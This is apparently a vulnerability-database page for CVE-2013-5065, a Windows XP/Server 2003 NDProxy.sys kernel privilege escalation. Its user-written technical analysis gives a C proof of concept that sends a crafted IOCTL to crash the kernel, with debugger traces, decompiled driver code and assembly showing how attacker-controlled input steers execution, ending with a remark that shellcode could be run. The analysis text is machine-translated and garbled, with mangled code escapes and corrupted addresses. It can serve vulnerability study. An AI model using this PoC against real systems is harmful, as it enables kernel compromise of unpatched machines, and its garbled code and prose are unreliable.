Attacker Value
Unknown
(1 user assessed)
Exploitability
Unknown
(1 user assessed)
User Interaction
Required
Privileges Required
None
Attack Vector
Local
0

CVE-2013-5065 Microsoft NDProxy.sys Privilege Escalation

Disclosure Date: November 28, 2013
Exploited in the Wild
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

NDProxy.sys in the kernel in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows local users to gain privileges via a crafted application, as exploited in the wild in November 2013.

Add Assessment

1
Technical Analysis

Xp recently broke a local kernel vulnerability extract is said to
capture the eyes of fire in Adobe 0day attack another 0day.

PoC

# Include " windows.h "
# include " stdio.h "
void main ()
{
    HANDLE hDev = CreateFile ( " . \ \ \ \ \ \ NDProxy " , GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0 , NULL);
     if (hDev == INVALID_HANDLE_VALUE)
    {
        printf ( " CreateFile Error:% d \ N " , GetLastError ());
    }
    DWORD inbuf [ 0x15 ] = { 0 };
    DWORD dwRetBytes  = 0 ;
    * (inbuf + 5 ) = 0x7030125 ;
    * (inbuf + 7 ) = 0x34 ;

    DeviceIoControl (hDev, 0x8fff23cc , inbuf, 0x54 , inbuf, 0x24 , & dwRetBytes, 0 );
    CloseHandle (hDev);
}

Details

Directly compiled to run on xp sp3 will cause a blue screen, attach the debugger, see the following
exceptions:

Access violation - code c0000005 (second chance!!!!!!)
 00000038 ?????
  kd> r
  eax = 000001B0 ecx = 00000000 ebx = 81e16d80 edx = 00000000 ESI = 81f31a30 edi = f88f273c
  eip = 00000038 esp = b203ec18 ebp = b203ec34 iopl up EI pl = 0 NV NZ Na PO NC
  cs = 0008 SS = 0010 DS = 0023 es = 0023 fs = 0030 GS = 0000 efl = 00010202
  00000038??
kd> kb
ChildEBP RetAddr Args to Child
WARNING: Frame IP Not in . any known Module Following frames May be wrong.
b203ec14 f88ed145 81f31a30 81a76c10 81f2b2c0 0x38
b203ec34 8 04ef129 81f46ed8 000001B0 8 06d32d0 NDProxy! PxIODispatch +0 x2b3
b203ec44 8 0575dde 81e16df0 81a76c10 81e16d80 nt! IopfCallDriver +0 X31
b203ec58 8 0576c7f 81f46ed8 81e16d80 81a76c10 nt! IopSynchronousServiceTail +0 X70
b203ed00 8 056f4ec 000007e8 00000000 00000000 nt! IopXxxControlFile +0 x5e7
b203ed34 8 053e648 000007e8 00000000 00000000 nt! NtDeviceIoControlFile +0 x2a
b203ed34 7c92e4f4 000007e8 00000000 00000000 nt! KiFastCallEntry +0 xf8
 0012fe4c 7c92d26c 7c801675 000007e8 00000000 ntdll! KiFastSystemCallRet
 0012fe50 7c801675 000007e8 00000000 00000000 ntdll! ZwDeviceIoControlFile +0 XC
 0012feb0 004010c2 000007e8 8fff23cc 0012ff28 0x7c801675
 0012ff80 004012e9 00000001 00380fc0 00381058 0x4010c2
 0012ffc0 7c817067 00241fe4 0012f7bc 7ffde000 0x4012e9
 0012fff0 00000000 00,401,200 00000000 78746341 0x7c817067

By using IDA io_code locate handler gPxIODispatch:

if (v7 == 0x8FFF23C8 | | v7 == 0x8FFF23CC )
    {
      V17 = LockState ;
      if (LockState <0x24 | | V6 <0x24)
      {
        v8 = - 1,073,741,820 ;
         GOTO LABEL_70 ;
      }
      v18 = * (_DWORD *) (v5 + 20 ) - 117637377 ;
       v36 = 36 ;
       if ((unsigned int ) v18 <= 0x24)

Restart, and then off to the next handler:

kd> bp NDProxy! PxIODispatch
kd> BL
0 e f888ce92 0001 (0001) NDProxy! PxIODispatch
kd> g

Run poc, program interrupt handler entrance,
Referring ida

v36 = 0 ;
   v2 = LockState ;
   v3 = * (_DWORD *) (LockState + 0x60) ;
   v4 = * (_BYTE *) v3 == 14 ;
   v5 = * (_DWORD *) (LockState + 0xC) ;/ / LockState + 0xC exactly InBuf pointer
   LockState = * (_DWORD *) (v3 + 8 ) ;
   V6 = * (_DWORD *) (v3 + 4 ) ;
   v35 = * (_DWORD *) (v3 + 4 ) ;
kd> dd esp
b20b5c38 804ef129 8212b488 81b28ce8 806d32d0
b20b5c48 80575dde 81b28d58 81ace8a8 81b28ce8
b20b5c58 b20b5d00 80576c7f 8212b488 81b28ce8
b20b5c68 81ace8a8 0012ff00 b20b5d01 b20b5d01
b20b5c78 00000002 b20b5d64 0012fe80 8056f4c2
b20b5c88 80545edc 0012019f 00000000 00000003
00000012 c0100080 b20b5c98 8218aa28 00000e3c
b20b5ca8 00000000 00000e40 00000000 81ace8ec
kd> dd 81b28ce8 +0 XC
81b28cf4 8212d490 8218ac38 8218ac38 00000000
00000000 01010001 0c000000 81b28d04 0012fe8c
81b28d14 00000000 00000000 00000000 00000000
00000000 00000000 00000000 81b28d24 0012ff28
81b28d34 8218aa28 00000000 00000000 00000000
00000000 81b28d58 81ace8a8 81b28d44 00000000
81b28d54 00000000 0005000e 00000024 00000054
00000000 8212b488 81ace8a8 81b28d64 8fff23cc
kd> dd 8212d490
8212d490 00000000 00000000 00000000 00000000
00000000 07030125 00000000 00000034 8212d4a0
8212d4b0 00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000 8212d4c0
8212d4d0 00000000 00000000 00000000 00000000
8212d4e0 00000000 00000000 0001000c 81ecdbf0
8212d4f0 0a060001 ee657645 00000001 00000001
00000000 81e55408 00000000 821b6980 8212d500

Look directly handle iocode places:

if (M_iocode == 0x8FFF23C8 | | M_iocode == 0x8FFF23CC )
    {
      V17 = LockState;
       if (LockState < 0x24 | | V6 < 0x24 )
      {
        v8 = 0xC0000004u ;
         GOTO LABEL_70;
      }
      v18 = * (_DWORD *) (v5 + 0x14 ) - 0x7030101 ;/ / v5 +0 x14 == 0x7030125
      v36 = 36 ;
       if ((unsigned int ) v18 <= 0x24 ) == 0x24 v18
      {
        v19 = * (_DWORD *) (v5 + 0x1c ); / / v19 = 0x34
        v20 = 3 * v18;
        v21 = v19 < dword_F8892004 [v20] ;/ / dword_F8892004 [v20] is exactly equal to 0x34
        LockState = v20 * 4 ;/ / v5 is assigned here
         if (v21 | | v19> V17 - 32 ) / / skip this if
        {
          * (_DWORD *) (V5 + 16 ) = 0xC0012019u ;
        }
        else / / enter here
        {
          V22 = KfAcquireSpinLock (& SpinLock);
          byte_F8892740 = V22;
           if (TspCB)
          {
            LOBYTE (v23) = V22;
            KfReleaseSpinLock ( & SpinLock, v23);
            * (_DWORD *) (v5 + 16 ) = 4097 ;
          }
          else
          {
            + + dword_F8892734;
             if ((unsigned int ) dword_F8892734> 0xFFFFFFFE )
              dword_F8892734 = - 2147483647 ;
            * (_DWORD *) (v5 + 12 ) = dword_F8892734;
            * (_DWORD *) (v5 + 8 ) = v2;
            LOBYTE (v23) = byte_F8892740;
            KfReleaseSpinLock ( & SpinLock, v23);
            * (_BYTE *) (* (_DWORD *) (v2 + 96 ) + 3 ) | = 1u ;
            V24 = (* ( int (__ stdcall **) ( int )) (( char *) & off_F8892008 + LockState)) (v5) ;/ / here exception of
             if (V24 == 259 )
               return 259 ;
            v36 = v35;
             if (v35> = * (_DWORD *) (v5 + 28 ) + 36 )
              v36 = * (_DWORD *) (v5 + 28 ) + 36 ;
            * (_DWORD *) (v5 + 16 ) = V24;
            _InterlockedExchange ((Signed __ Int32 *) (v2 + 56 ), 0 );
          }
        }
      }

assembler code is as follows:

text: F885D0AD loc_F885D0AD:; CODE XREF: PxIODispatch (x, x) +20 D J
. text: F885D0AD mov ecx, [ESI +1 Ch] / / ESI +1 c controllable
text: F885D0B0 lea eax, [eax + eax * 2. ] / / eax controllable
text:. F885D0B3 shl eax, 2
text:. F885D0B6 cmp ecx, dword_F8862004 [eax]
text:. F885D0BC mov dword ptr [ebp + LockState.LockState], eax / / pollution LockState.LockState
text.: F885D0BF JNB short loc_F885D0CD
. text: F885D0C1
text: F885D0C1 loc_F885D0C1:;. CODE XREF: PxIODispatch (x, x) +240 J
text: F885D0C1 mov dword ptr [ESI +10 h], 0C0012019h.
text: F885D0C8 jmp loc_F885D172.
...
. Text: mov eax F885D134, [ebx +60 h]
text:. F885D137 or byte ptr [eax +3], 1
text:. F885D13B mov eax, dword ptr [ebp + LockState.LockState] / / pollution eax
text:. F885D13E PUSH ESI
. text: F885D13F Call off_F8862008 [eax]; Exception!
Contaminated eax as an array subscript off_F8862008 passed to the eip.
kd> g
Breakpoint 2 HIT
NDProxy PxIODispatch +0 x2ad:!
! f885d13f ff90082086f8 Call dword ptr NDProxy TapiOids +0 x8 (f8862008) [eax]
kd> r
eax = 000001B0 ecx = 00000000 ebx = 81e2c2f8 edx = 00000000 ESI = 81cc9368 edi = f886273c
eip = f885d13f esp = b1bd9c1c ebp = b1bd9c34 iopl up EI pl = 0 NV NZ Na PO NC
cs = 0008 SS = 0010 DS = 0023 es = 0023 fs = 0030 GS = 0000 efl = 00000202
NDProxy PxIODispatch +0 x2ad:!
f885d13f ff90082086f8 Call dword ! ptr NDProxy TapiOids +0 x8 (f8862008) [eax] ds: 0023: f88621b8 = 00000038

Here eax = 0x1b0 ie 0x24 * 3 * 4

As for how not to good use, can now expect to be able to control the array eax certain locations
to perform shellcode.

CVSS V3 Severity and Metrics
Base Score:
7.8 High
Impact Score:
5.9
Exploitability Score:
1.8
Vector:
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Attack Vector (AV):
Local
Attack Complexity (AC):
Low
Privileges Required (PR):
None
User Interaction (UI):
Required
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High

General Information

Vendors

  • microsoft

Products

  • windows 2003 server -,
  • windows xp -

Exploited in the Wild

Reported by:

Additional Info

Technical Analysis